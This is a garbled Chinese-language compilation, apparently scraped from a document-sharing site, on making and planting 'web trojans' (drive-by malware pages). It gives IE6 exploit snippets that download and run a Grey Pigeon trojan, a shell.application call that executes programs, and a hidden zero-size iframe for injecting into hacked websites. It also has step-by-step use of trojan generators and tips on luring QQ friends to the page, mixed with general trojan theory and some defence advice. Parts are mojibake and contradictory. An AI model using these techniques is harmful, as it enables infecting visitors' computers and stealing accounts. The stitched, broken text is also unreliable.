网页木马制作全过程(详细)
asp编写网页木马的方法
asp编写网页木马的方法
欢迎大家在这里学习asp编写网页木马!这里是我们给大家整理出来的精彩内容。
我相信,这些问题也肯定是很多朋友在关心的,所以我就给大家谈谈这个!我们经常听到这样的忠告:不要随意下在不明的程序,不要随意打开邮件的附件...这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.
首先我们需要编写几个简单的文件
一。
名字为abc.abc的文件
其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc 也必须保存在发布的目录下。
二。
名字为test.htm的文件
木马运行测试!(这句话可以改成你想说的)
三。
名字为win.test的文件。
网页挂马手段全解析
---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一,在 2008 年到2010 年间,网页挂马攻击更是成为了黑客最主要的攻击手段。
根据瑞星云安全系统监测, 2008 年到 2010 年间,客户端受到恶意网马的年攻击次数达到千万级别。
虽然近两年来,网络钓鱼攻击已经在数量上超越了网页挂马攻击,但是网页挂马攻击所带来的危害依然巨大,不仅对网站的安全运行造成威胁,对客户端用户来说,网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。
常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后,在网站的页面中插入一些代码,当浏览者访问到这些包含有恶意代码的网页时,就会在不知不觉中执行相应的漏洞利用程序。
这些程序可以在浏览者的电脑上下载并执行木马程序,导致浏览者的电脑成为黑客的肉鸡。
挂马操作可以有多种方式实现,以下是比较常见的几种挂马攻击手段。
1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架,在访问网页时,从网页表面是无法通过肉眼看到这个框架的,只能通过网页源码分析或抓包的方式查看到相应的数据信息。
1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中,同时恶意篡改网站文件中的 JS 文件代。
一般来讲,那些被全站引用的 JS 代码最容易被黑客挂马。
3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理,黑客通过加密代码的方式隐藏了该信息。
4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的,当用户访问挂有以上代码的网页时,页面就会自动跳转去执行黑客指定的恶意页面,从而导致挂在恶意页面的木马在本地被执行。
网页挂马的流程
网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件,如果网站存在SQL注入漏洞,则比较容易取得一定的权限。
如果在服务器上对网站目录等做了较严格的权限限制,也是比较容易取得Webshell权限,具有Webshell权限可以对网页文件进行修改,而挂马就是在网页中加入一些代码。
这些代码往往是利用浏览器或者应用程序的漏洞,浏览者在访问这些网页时,往往会在不知不觉中去下载一些木马程序来执行。
网站挂马的原理就是设置框架网页的宽度和高度为0,将一些恶意网页隐藏起来,用户访问网站时不容易觉察。
目前在网络上有很多网页木马生成器,简称“网马生成器”,本案例以“Ms-0733网马生成器”为例,来讲解如何进行网站挂马攻击。
步骤一配置网页木马。
在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端,然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”,如图1所示,然后单击“生成木马”即可生成一网页文件HACKLL.HTM。
配置Ms-0733网马生成器步骤二修改网站网页文件。
在网站首页文件index.asp中加入已经配置好的网页木马htm文件,一般通过在页面中加入“”来实现,如图2所示。
加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞,其网页木马最本质的东西有两个一个是脚本,另外一个是真正的木马服务端,利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。
其网页木马文件中多是一些JavaScript代码,如图3所示。
网页木马源代码测试网页木马是否能够正常执行。
在未安装微软的MS0933补丁程序的虚拟机中打开浏览器,并在其中输入网页木马的地址,一会儿后,在控制端就看见肉鸡上线了。
大量传播网页木马。
网页木马测试成功以后,就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上,只要访问者的系统未安装其网页木马利用的漏洞,如果系统未安装任何对网页木马进行防御的软件,则计算机感染网页木马的几率非常大。
网页木马制作
newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个newproject.chm ,然后把他改任意名上传空间。
test.exe:木马程序。
Байду номын сангаас
上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!
最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索iframe就能找到了我们的木马了,一个del,哈哈~~~~玩完了。
所以,下面再介绍几个把。
单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件,代码如下
A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C。不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。
D。不随便打开和预览有附件的邮件。
E。安装防火墙和杀毒软件的最新版本,经常进行升级和查毒
<html><body>
木马运行测试!(这句话可以改成你想说的)
木马制作
1.冰狐浪子网页木马生成器
2.一个网页编辑器(frontpage或dreamweaver都可以,我习惯用的是dreamweaver);
3.图片一张(主要用来起迷惑作用,至于放什么样的图片大家可以自由发挥)
4.木马一个,至于是QQ盗号器?灰鸽子?还是黑洞?都可以,我建议大家准备一个50KB以下的小马,否则木马还没
下面我们打开网页编辑器,新建一个网页,"插入"---"图片"打开插入图片的对话框,选择刚才准备好的图
片按确定.
然后转到代码编辑窗口,插入一个嵌入式框架,把框架长度和宽度都改为0,框架连接到刚才icyfox.htm文件的
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional// EN"
把<A href="/Article/UploadFiles/200510/20051011015656342.gif)里修改下就可以用了.冰狐浪子的使用方法:用你的木马程序替换" icyfox?目录下的?#.exe?<BR><U><FONT color=#0000ff>然后运行"生成.bat",你会在"muma"目录下得到文件"icyfox.js"修 改"icyfox.htm"文件中的两处<BR><A href="/muma">/muma</A><BR>为你上传到主页空间的"icyfox.js"文件的URL路径</P>
木马的工作原理
木马的工作原理
木马是一种恶意软件,通过欺骗或者胁迫方式侵入电脑系统,并在背后执行不被用户知晓的操作。
木马的工作原理可以描述为以下几个步骤:
1. 渗透:木马首先要渗透到受害者的电脑系统中。
这可以通过诱骗用户点击恶意链接、下载感染文件、插入感染的移动存储设备等方式实现。
2. 安装:一旦成功渗透,木马会开始安装自己到受害者电脑系统中,通常是将木马隐藏在合法的程序或文件中,来避免受到用户的怀疑。
3. 打开后门:安装完成后,木马会打开一个后门,以便攻击者可以远程操作受感染的电脑。
通过这个后门,攻击者可以执行各种恶意操作,比如窃取敏感个人信息、操控计算机、启动其他恶意软件等。
4. 隐蔽行动:为了不被用户察觉,木马会尽可能隐藏自己的存在。
这可以包括隐藏进程、修改注册表、关闭安全软件和防护机制等操作。
5. 通信与命令控制:木马通常会与控制服务器建立连接,通过命令控制来获取指令、向攻击者报告信息以及接收新的命令和更新。
6. 恶意行为:木马还可以执行各种其他恶意行为,比如窃取账
户密码、传播自身到其他系统、发起拒绝服务攻击等。
总之,木马的工作原理是通过欺骗和操控来在电脑系统中埋下后门,并获取对目标系统的控制权限,以实现攻击者的目的。
用户需要保持警惕,避免点击可疑链接、下载非信任来源的文件,以及定期更新和使用安全软件来防护自己的电脑。
木马工作原理及过程
1
计算机网络安全技术
木马攻击技术
第2章 黑客常用的攻击方法
2
木马(Trojan horse)
2015年新增病毒样本3715万例
木马是一种基于远程 控制的黑客工具 隐蔽性 潜伏性 危害性
非授权性
木马攻击技术
木马的工作原理——本质上是一个C/S模式的程序
第2章 黑客常用的攻击方法
Netspy (网络精灵)
流行 木马
网络公牛
远程访问型
下载型木马
广外女生
网络神偷(Nethief)
木马攻击技术
第2章 黑客常用的攻击方法
5
木马实施攻击的步骤
配置木马
木马伪装 信息反馈
启动木马
自动启动 潜伏待命
远程控制
传播木马
软件下载、邮件附件 淫秽图片、通信软件
建立连接
主动连接 被动连接
01
02
03
3
控制端
被植入木马的PC(server程序)
端口
操作系统
TCP/IP协议
TCP/IP协议 端口
操作系统
控制木马的PC(client程序)
端口处于监听状态
木马攻击技术
第2章 黑客常用的攻击方法
4
木马的分类
破坏型 密码发送型 代理型
流行木马简介
冰河
back orifice
Subseven
键盘记录型
FTP型
04
05
木马攻击技术
第2章 黑客常用的攻击方法
6
冰河木马
服务器端程序:G-server.exe
客户端程序:G-client.exe
网页木马制作全过程(详细)
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的</BODY>…</BODY>之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录<Temporary Internet Files>,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
图1 网页木马示例小提示:灰鸽子木马为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。
图2 灰鸽子控制短示例(汗!又一大毒枭:))⒉自动运行程序<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application");space("c:\\Windows\\").items().item("Notepad.exe").invokeve rb(); </SCRIPT>把这段代码插入到网页源代码的</BODY>…</BODY>之间,然后用IE打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。
通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。
另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。
图3 加密后的网页代码二、网页木马的基本用法理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。
实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。
在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4 网页木马生成器第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。
上传该文件到自己的Web服务器或免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。
实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
在下面我们只介绍黑客如何在知名网站上挂网页木马。
下面来看这一段代码:iframe src="/hk.htm" width="0" height="0" frameborder="0"></iframe>小提示:“src”的属性“/hk.htm”是上传到服务器上的网页木马的网址。
把这段代码插入到某门户网站首页源代码的</BODY>…</BODY>之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中<iframe>标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中。
<iframe>也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果(如图5),被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。
在上代代码中,因为把宽(width)、高(height)、边框(frameborder)都设置为了“0”,所以,上述代码插入到门户网站的首页后,网站的首页不会发生变化,但是,由于嵌入的网页实际上已经打开了,所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。
图5 iframe标签示例也许有人会问,如何把上述代码插入到门户网站首页的源代码中?这个问题问得好,本人才疏学浅,确实无法进入他们的服务器修改网页,但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限,那么修改他们的网页就跟在本地制作一个网页一样容易。
有人还问,拿到服务器的webshell权限容易吗?如果你对网络安全比较关注,你会发现,经常有这个网站被黑了,那个网站的主页被修改了的新闻爆出。
有人还问,门户的服务器几乎无漏洞可找,个人服务器的漏洞较多,你能进入吗?本人不是黑客,中华人民共和国的法律规定,入侵和篡改他人服务器上的信息是违法行为,希望大家共同维护网络安全。
以前,在网上打开一些有名的网站时杀毒软件也会报警,现在你明白其中的道理了吧。
有些人在这些网站发帖子骂娘,看了本文,希望在骂娘时你也能为那些垫背的站长想想。
三:网页木马的防范策略网页木马的防范只靠杀毒软件和防火墙是远远不够的,因为一旦黑客使用了反弹端口的个人版木马(个人反汇编的一些杀毒软件无法识别的木马),那么杀毒软件和防火墙就无可奈何,所以,网页木马的防范要从它的原理入手,从根子上进行防范。
一即时安装安全补丁网页木马都是利用IE漏洞进行传播的,我们拿冰狐浪子的网页木马(用“冰狐浪子网页木马生成器”制作的网页木马)来说吧,该网页能绕过IE的安全设置,当用户连接到该网页时,它能在普通用户不知情的情况下在后台下载一个木马并运行(安装)该木马。
所以,经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。
二改名或卸载(反注册)最不安全的ActiveXObject(IE插件)在系统中有些ActiveXObject会运行EXE程序,比如本文中“自动运行程序”代码中的Shell.application控件,这些控件一旦在网页中获得了执行权限,那么它就会变为木马运行的“温床”,所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。
但是ActiveXObject是为了应用而出现的,而不是为了攻击而出现的,所有的控件都有它的用处,所以在改名或卸载一个控件之前,你必须确认这个控件是你不需要的,或者即使卸载了也不关大体的。
⒈卸载(反注册)ActiveXObject第一步:在“开始”菜单上单击“运行”,输入“CMD”命令打开命令提示符窗口。
第二步:在命令提示符下输入“regsvr32.exe shell32.dll /u/s”,然后回车就能将Shell.application控件卸载。
如果日后我们希望继续使用这个控件的话,可以在命令提示符窗口中输入“regsvr32.exe shell32.dll /i/s”命令将它们重新安装(注册)。
在上述命令中:“regsvr32.exe”是注册或反注册OLE对象或控件的命令,[/u]是反注册参数,[/s]是寂静模式参数,[/I]为安装参数。